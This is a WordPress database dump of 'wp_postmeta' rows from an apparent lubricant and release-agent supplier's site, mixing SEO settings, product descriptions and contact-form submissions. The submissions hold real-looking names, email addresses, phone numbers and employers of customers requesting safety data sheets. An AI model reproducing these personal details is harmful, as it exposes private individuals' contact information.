INSERT INTO `wp_postmeta` VALUES (21584, 2265, '_field_3', 'I am looking for some PTFE mold release that can be placed on high temp RTV silicone rubber to release polyethylene wax w/o contamination or sticking.   I was looking at your MS-143 series...?  Could I obtain a sample?  What do you suggest?'); 
INSERT INTO `wp_postmeta` VALUES (21585, 2265, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (21586, 2265, '_sub_id', '2265'); 
INSERT INTO `wp_postmeta` VALUES (21587, 2266, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21588, 2266, '_seq_num', '21'); 
INSERT INTO `wp_postmeta` VALUES (21589, 2266, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21590, 2266, '_field_12', 'Nicholas Gurrisi'); 
INSERT INTO `wp_postmeta` VALUES (21591, 2266, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (21592, 2266, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (21593, 2266, '_field_14', 'Nicholas.Gurrisi@cfa.harvard.edu'); 
INSERT INTO `wp_postmeta` VALUES (21594, 2266, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (21595, 2266, '_field_16', 'I would like to have the SDS for MS-136N/CO2 Release Agent - Hot Molds.\r\n\r\nThank you!'); 
INSERT INTO `wp_postmeta` VALUES (21596, 2266, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21597, 2266, '_sub_id', '2266'); 
INSERT INTO `wp_postmeta` VALUES (21598, 989, '_wp_old_slug', 'krytox-ts4'); 
INSERT INTO `wp_postmeta` VALUES (21599, 989, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21600, 2265, '_edit_lock', '1475674759:2'); 
INSERT INTO `wp_postmeta` VALUES (21601, 2266, '_edit_lock', '1475676058:2'); 
INSERT INTO `wp_postmeta` VALUES (21602, 2255, '_edit_lock', '1475677016:2'); 
INSERT INTO `wp_postmeta` VALUES (21603, 2247, '_edit_lock', '1475676107:2'); 
INSERT INTO `wp_postmeta` VALUES (21628, 2267, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (21629, 2267, '_seq_num', '30'); 
INSERT INTO `wp_postmeta` VALUES (21630, 2267, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21631, 2267, '_field_1', 'VASANT UCHIL'); 
INSERT INTO `wp_postmeta` VALUES (21632, 2267, '_field_10', 'ICMC'); 
INSERT INTO `wp_postmeta` VALUES (21633, 2267, '_field_2', 'vasantuchil@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (21634, 2267, '_field_8', '+919820149188'); 
INSERT INTO `wp_postmeta` VALUES (21635, 2267, '_field_3', 'GREETINGS FROM INDIA.\r\nWE ARE INTERESTED TO PROCURE PTFE  RELEASE AGENT FOR COMPOSITE MANUFACTURE, IDEALLY  WATER BASED.\r\nPLEASE MAIL GRADE &amp; PACKING WITH FREE SAMPLE-3 NOS FOR TRIAL &amp; APPROVAL.\r\nWARM REGARDS,\r\n\r\nVASANT UCHIL\r\nICMC'); 
INSERT INTO `wp_postmeta` VALUES (21636, 2267, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (21637, 2267, '_sub_id', '2267'); 
INSERT INTO `wp_postmeta` VALUES (21638, 2268, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21639, 2268, '_seq_num', '22'); 
INSERT INTO `wp_postmeta` VALUES (21640, 2268, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21641, 2268, '_field_12', 'Mubetcel Moorefield'); 
INSERT INTO `wp_postmeta` VALUES (21642, 2268, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (21643, 2268, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (21644, 2268, '_field_14', 'mubetcel@s2rlab.com'); 
INSERT INTO `wp_postmeta` VALUES (21645, 2268, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (21646, 2268, '_field_16', 'I am the CHO of our lab.  We have your stripping agent MS-111 which requires its SDS.\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (21647, 2268, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21648, 2268, '_sub_id', '2268'); 
INSERT INTO `wp_postmeta` VALUES (21649, 2269, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (21650, 2269, '_seq_num', '31'); 
INSERT INTO `wp_postmeta` VALUES (21651, 2269, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21652, 2269, '_field_1', 'Stefanie Yoder'); 
INSERT INTO `wp_postmeta` VALUES (21653, 2269, '_field_10', 'MSDS Source'); 
INSERT INTO `wp_postmeta` VALUES (21654, 2269, '_field_2', 'stefanie@msdssource.biz'); 
INSERT INTO `wp_postmeta` VALUES (21655, 2269, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (21656, 2269, '_field_3', 'I am writing on behalf of my customer, Covenant Health, to obtain an SDS for one of their in-stock products. I need a safety sheet for the following product: MS-182 Skin Degreaser. Please forward this document to me at your earliest convenience. Thank you!'); 
INSERT INTO `wp_postmeta` VALUES (21657, 2269, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (21658, 2269, '_sub_id', '2269'); 
INSERT INTO `wp_postmeta` VALUES (21659, 2270, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (21660, 2270, '_seq_num', '32'); 
INSERT INTO `wp_postmeta` VALUES (21661, 2270, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21662, 2270, '_field_1', 'Stefanie Yoder'); 
INSERT INTO `wp_postmeta` VALUES (21663, 2270, '_field_10', 'MSDS Source'); 
INSERT INTO `wp_postmeta` VALUES (21664, 2270, '_field_2', 'stefanie@msdssource.biz'); 
INSERT INTO `wp_postmeta` VALUES (21665, 2270, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (21666, 2270, '_field_3', 'I am writing on behalf of my customer, Covenant Health, to obtain an SDS for one of their in-stock products. I need a safety sheet for the following product: MS-242N Quik-Freeze. Please forward this document to me at your earliest convenience. Thank you!'); 
INSERT INTO `wp_postmeta` VALUES (21667, 2270, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (21668, 2270, '_sub_id', '2270'); 
INSERT INTO `wp_postmeta` VALUES (21669, 425, '_wp_old_slug', 'releasys-89'); 
INSERT INTO `wp_postmeta` VALUES (21670, 2271, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21671, 2271, '_seq_num', '23'); 
INSERT INTO `wp_postmeta` VALUES (21672, 2271, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21673, 2271, '_field_12', 'MIGUEL LOPEZ'); 
INSERT INTO `wp_postmeta` VALUES (21674, 2271, '_field_13', 'AERO HARDWARE &amp; PARTS'); 
INSERT INTO `wp_postmeta` VALUES (21675, 2271, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (21676, 2271, '_field_14', 'MAL@AEROHARDWAREPARTS.COM'); 
INSERT INTO `wp_postmeta` VALUES (21677, 2271, '_field_15', '(914) 273-8550'); 
INSERT INTO `wp_postmeta` VALUES (21678, 2271, '_field_16', 'please send a copy of SDS p/n: 240 AC Krytox grease tube'); 
INSERT INTO `wp_postmeta` VALUES (21679, 2271, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21680, 2271, '_sub_id', '2271'); 
INSERT INTO `wp_postmeta` VALUES (21681, 425, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21682, 425, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21683, 425, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (21684, 425, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21685, 425, '_ywtm_content_tab_description', 'ReleaSys 89 is a nonflammable, low odor solvent-based, semi-permanent mold release agent designed to provide superior durability and high slip across a broad range of moldable substrates.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal build-up.  This formulation is particularly effective on difficult molding application or abrasive substrates. ReleaSys 89 will not interfere with post-production finishing operation. Benefits of this product include:\r\n<ul>\r\n 	<li>Exceptional durability and surface adhesion</li>\r\n 	<li>High Slip;Ideal for complex mold geometries</li>\r\n 	<li>Improves quality of molded parts</li>\r\n 	<li>Minimal mold build up</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (21686, 425, '_yoast_wpseo_focuskw_text_input', 'Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (21687, 425, '_yoast_wpseo_focuskw', 'Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (21688, 2267, '_edit_lock', '1475686196:1'); 
INSERT INTO `wp_postmeta` VALUES (21689, 2271, '_edit_lock', '1475686220:1'); 
INSERT INTO `wp_postmeta` VALUES (21690, 672, '_wp_old_slug', 'xht-ac'); 
INSERT INTO `wp_postmeta` VALUES (21691, 672, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21692, 672, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21693, 672, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21694, 672, '_yoast_wpseo_focuskw_text_input', 'Krytox XHT AC'); 
INSERT INTO `wp_postmeta` VALUES (21695, 672, '_yoast_wpseo_focuskw', 'Krytox XHT AC'); 
INSERT INTO `wp_postmeta` VALUES (21696, 672, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21697, 672, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21698, 674, '_wp_old_slug', 'xht-acx'); 
INSERT INTO `wp_postmeta` VALUES (21699, 674, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21700, 674, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21701, 674, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21702, 674, '_yoast_wpseo_focuskw_text_input', 'Krytox XHT-ACX'); 
INSERT INTO `wp_postmeta` VALUES (21703, 674, '_yoast_wpseo_focuskw', 'Krytox XHT-ACX'); 
INSERT INTO `wp_postmeta` VALUES (21704, 674, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21705, 674, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21706, 425, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (21707, 675, '_wp_old_slug', 'xht-bd'); 
INSERT INTO `wp_postmeta` VALUES (21708, 675, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21709, 675, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21710, 675, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21711, 675, '_yoast_wpseo_focuskw_text_input', 'Krytox XHT-BD'); 
INSERT INTO `wp_postmeta` VALUES (21712, 675, '_yoast_wpseo_focuskw', 'Krytox XHT-BD'); 
INSERT INTO `wp_postmeta` VALUES (21713, 675, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21714, 675, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21715, 697, '_wp_old_slug', 'xht-bdx'); 
INSERT INTO `wp_postmeta` VALUES (21716, 697, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21717, 697, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21718, 697, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21719, 697, '_yoast_wpseo_focuskw_text_input', 'Krytox XHT-BDX'); 
INSERT INTO `wp_postmeta` VALUES (21720, 697, '_yoast_wpseo_focuskw', 'Krytox XHT-BDX'); 
INSERT INTO `wp_postmeta` VALUES (21721, 697, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21722, 697, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21723, 696, '_wp_old_slug', 'xht-bdz'); 
INSERT INTO `wp_postmeta` VALUES (21724, 696, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21725, 696, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21726, 696, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21727, 696, '_yoast_wpseo_focuskw_text_input', 'Krytox XHT-BDZ'); 
INSERT INTO `wp_postmeta` VALUES (21728, 696, '_yoast_wpseo_focuskw', 'Krytox XHT-BDZ'); 
INSERT INTO `wp_postmeta` VALUES (21729, 696, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21730, 696, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21731, 2275, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21732, 2275, '_seq_num', '24'); 
INSERT INTO `wp_postmeta` VALUES (21733, 2275, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21734, 2275, '_field_12', 'Sue Emery'); 
INSERT INTO `wp_postmeta` VALUES (21735, 2275, '_field_13', 'Hunter Douglas'); 
INSERT INTO `wp_postmeta` VALUES (21736, 2275, '_field_18', '43'); 
INSERT INTO `wp_postmeta` VALUES (21737, 2275, '_field_14', 'sue.emery@hunterdouglas.com'); 
INSERT INTO `wp_postmeta` VALUES (21738, 2275, '_field_15', '(303) 876-3417'); 
INSERT INTO `wp_postmeta` VALUES (21739, 2275, '_field_16', 'Please send me the current SDS for MS-242N Quik-Freeze\r\nCAS No. 811-97-2'); 
INSERT INTO `wp_postmeta` VALUES (21740, 2275, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21741, 2275, '_sub_id', '2275'); 
INSERT INTO `wp_postmeta` VALUES (21742, 659, '_wp_old_slug', 'xht-s'); 
INSERT INTO `wp_postmeta` VALUES (21743, 659, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21744, 659, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21745, 659, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21746, 659, '_yoast_wpseo_focuskw_text_input', 'Krytox XHT-S'); 
INSERT INTO `wp_postmeta` VALUES (21747, 659, '_yoast_wpseo_focuskw', 'Krytox XHT-S'); 
INSERT INTO `wp_postmeta` VALUES (21748, 659, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21749, 659, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21750, 671, '_wp_old_slug', 'xht-sx'); 
INSERT INTO `wp_postmeta` VALUES (21751, 671, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21752, 671, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21753, 671, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21754, 671, '_yoast_wpseo_focuskw_text_input', 'Krytox XHT-SX'); 
INSERT INTO `wp_postmeta` VALUES (21755, 671, '_yoast_wpseo_focuskw', 'Krytox XHT-SX'); 
INSERT INTO `wp_postmeta` VALUES (21756, 671, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21757, 671, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21758, 2277, '_edit_lock', '1476302794:2'); 
INSERT INTO `wp_postmeta` VALUES (21759, 2277, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (21760, 2278, '_wp_attached_file', '2016/10/Krytox-FAQ.jpg'); 
INSERT INTO `wp_postmeta` VALUES (21761, 2278, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5648;s:6:"height";i:3765;s:4:"file";s:22:"2016/10/Krytox-FAQ.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"Krytox-FAQ-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"Krytox-FAQ-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"Krytox-FAQ-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"Krytox-FAQ-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"Krytox-FAQ-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"Krytox-FAQ-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"Krytox-FAQ-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"Krytox-FAQ-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (21762, 2277, '_thumbnail_id', '2278'); 
INSERT INTO `wp_postmeta` VALUES (21764, 2277, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (21765, 2277, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (21766, 2277, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (21767, 2277, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21768, 2277, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (21769, 2277, '_yoast_wpseo_focuskw_text_input', 'Krytox FAQ'); 
INSERT INTO `wp_postmeta` VALUES (21770, 2277, '_yoast_wpseo_focuskw', 'Krytox FAQ'); 
INSERT INTO `wp_postmeta` VALUES (21771, 2277, '_yoast_wpseo_title', 'Krytox FAQ - Frequently Asked Questions - Industrial Uses'); 
INSERT INTO `wp_postmeta` VALUES (21772, 2277, '_yoast_wpseo_metadesc', 'This Krytox FAQ article helps to simply the uses of Krytox and give a general overview of the product line in an easy to read manner.'); 
INSERT INTO `wp_postmeta` VALUES (21773, 2277, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21774, 2277, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21775, 2277, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (21776, 714, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21777, 714, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21778, 714, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21779, 714, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (21780, 714, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21781, 714, '_ywtm_content_tab_description', 'Krytox AUT 2245 performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers. Our family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox AUT 2245 during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox AUT 2245 provides longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n\r\nKrytox AUT 2245 grease typically lasts 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.'); 
INSERT INTO `wp_postmeta` VALUES (21782, 717, '_yoast_wpseo_linkdex', '92'); 
INSERT INTO `wp_postmeta` VALUES (21783, 717, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21784, 717, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21785, 717, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (21786, 717, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21787, 717, '_ywtm_content_tab_description', 'Krytox AUT 2E45 greases offer the potential for lubed-for-life properties in demanding electrical motor service. Krytox greases are non-oxidizing, water-resistant, nonflammable, and chemically inert.\r\n\r\nKrytox AUT 2E45 greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener.\r\n\r\nThe PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox greases provide a thicker oil layer and reduce wear. Krytox greases are compatible with metals and most seal materials, but require removal of all old lubricants from the motor bearings before application.\r\n\r\nKrytox AUT 2E45 grease offers the following benefits and features:\r\n<strong>Unsurpassed oxidation resistance of base oil </strong>\r\nPFPE will not oxidize and gum up with age and use. Will not break down with high temperatures experienced in electric motors. Operating temperature range from –44 to 200 °C (–47 to 392 °F)\r\n\r\n<strong>Advanced PTFE thickener</strong>\r\nSpecial high efficiency thickener will not oxidize or break down with shear\r\n\r\n<strong>Lubed-for-life potential</strong>\r\nTypically, no need to re-lubricate bearings during lifetime of electric motor\r\n\r\n<strong>Excellent corrosion resistance</strong>\r\nAdditives offer resistance to corrosion and rust during storage and in wet environments\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (21788, 715, '_yoast_wpseo_linkdex', '81'); 
INSERT INTO `wp_postmeta` VALUES (21789, 715, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21790, 715, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21791, 715, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (21792, 715, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21793, 715, '_ywtm_content_tab_description', 'Krytox AUT 2A45 greases offer the potential for lubed-for-life properties in demanding electrical motor service. Krytox greases are non-oxidizing, water-resistant, nonflammable, and chemically inert.\r\n\r\nKrytox AUT 2A45 greases contain perfluoropolyether (PFPE) oil and a polytetrafluoroethylene (PTFE) thickener.\r\n\r\nThe PFPE oil and PTFE thickener will not oxidize and gum up like ordinary synthetic or hydrocarbon-based greases. Krytox greases are recommended by many major bearing manufacturers for long-life lubrication in severe applications. The superior film-forming capability of Krytox greases provide a thicker oil layer and reduce wear. Krytox greases are compatible with metals and most seal materials, but require removal of all old lubricants from the motor bearings before application.\r\n\r\nKrytox AUT 2A45 grease offers the following benefits and features:\r\n<strong>Unsurpassed oxidation resistance of base oil </strong>\r\nPFPE will not oxidize and gum up with age and use. Will not break down with high temperatures experienced in electric motors. Operating temperature range from –44 to 200 °C (–47 to 392 °F)\r\n\r\n<strong>Advanced PTFE thickener</strong>\r\nSpecial high efficiency thickener will not oxidize or break down with shear\r\n\r\n<strong>Lubed-for-life potential</strong>\r\nTypically, no need to re-lubricate bearings during lifetime of electric motor\r\n\r\n<strong>Excellent corrosion resistance</strong>\r\nAdditives offer resistance to corrosion and rust during storage and in wet environments'); 
INSERT INTO `wp_postmeta` VALUES (21794, 425, '_wp_old_slug', 'releasys-89-semi-permanent-release-agents'); 
INSERT INTO `wp_postmeta` VALUES (21795, 2281, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21796, 2281, '_seq_num', '25'); 
INSERT INTO `wp_postmeta` VALUES (21797, 2281, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21798, 2281, '_field_12', 'Mariah Voskamp'); 
INSERT INTO `wp_postmeta` VALUES (21799, 2281, '_field_13', 'L3 MAS'); 
INSERT INTO `wp_postmeta` VALUES (21800, 2281, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (21801, 2281, '_field_14', 'mariah.voskamp@l3com.com'); 
INSERT INTO `wp_postmeta` VALUES (21802, 2281, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (21803, 2281, '_field_16', 'Looking for an MSDS sheet for product DPMS- W1023A,\r\nUnable to locate online anywhere and is needed for disposal of the expired product.\r\nThanks'); 
INSERT INTO `wp_postmeta` VALUES (21804, 2281, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21805, 2281, '_sub_id', '2281'); 
INSERT INTO `wp_postmeta` VALUES (21806, 2282, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21807, 2282, '_seq_num', '26'); 
INSERT INTO `wp_postmeta` VALUES (21808, 2282, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21809, 2282, '_field_12', 'Mike Krisby'); 
INSERT INTO `wp_postmeta` VALUES (21810, 2282, '_field_13', 'Roeslein'); 
INSERT INTO `wp_postmeta` VALUES (21811, 2282, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (21812, 2282, '_field_14', 'mkrisby@roeslein.com'); 
INSERT INTO `wp_postmeta` VALUES (21813, 2282, '_field_15', '(618) 317-5079'); 
INSERT INTO `wp_postmeta` VALUES (21814, 2282, '_field_16', 'I am looking for a SS thread sealant compound for Natural Gas.\nThe working pressure is 4000psi.\nDo you have a recommendation?\nI was looking at the TS4 product.\nThank you,\nMike '); 
INSERT INTO `wp_postmeta` VALUES (21815, 2282, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21816, 2282, '_sub_id', '2282'); 
INSERT INTO `wp_postmeta` VALUES (21818, 1117, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (21819, 1117, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21820, 1117, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (21821, 1117, '_yoast_wpseo_focuskw_text_input', 'Lube For Life'); 
INSERT INTO `wp_postmeta` VALUES (21822, 1117, '_yoast_wpseo_focuskw', 'Lube For Life'); 
INSERT INTO `wp_postmeta` VALUES (21823, 1117, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21824, 1117, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21825, 1117, '_yoast_wpseo_primary_category', ''); 
INSERT INTO `wp_postmeta` VALUES (21827, 2277, '_yoast_wpseo_linkdex', '94'); 
INSERT INTO `wp_postmeta` VALUES (21829, 2056, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (21830, 2056, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21831, 2056, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (21833, 1601, '_yoast_wpseo_linkdex', '99'); 
INSERT INTO `wp_postmeta` VALUES (21836, 1135, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (21837, 1135, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21838, 1135, '_yoast_wpseo_focuskw_text_input', 'Vapor Degreasing Solvent'); 
INSERT INTO `wp_postmeta` VALUES (21839, 1135, '_yoast_wpseo_focuskw', 'Vapor Degreasing Solvent'); 
INSERT INTO `wp_postmeta` VALUES (21840, 1135, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (21841, 1135, '_yoast_wpseo_focuskeywords', '[{"keyword":"trichloroethylene replacement","score":"ok"},{"keyword":"n-propyl bromide ","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (21842, 1135, '_wp_old_slug', 'opteon-sion-for-vapor-degreasing'); 
INSERT INTO `wp_postmeta` VALUES (21843, 1135, '_yoast_wpseo_primary_category', ''); 
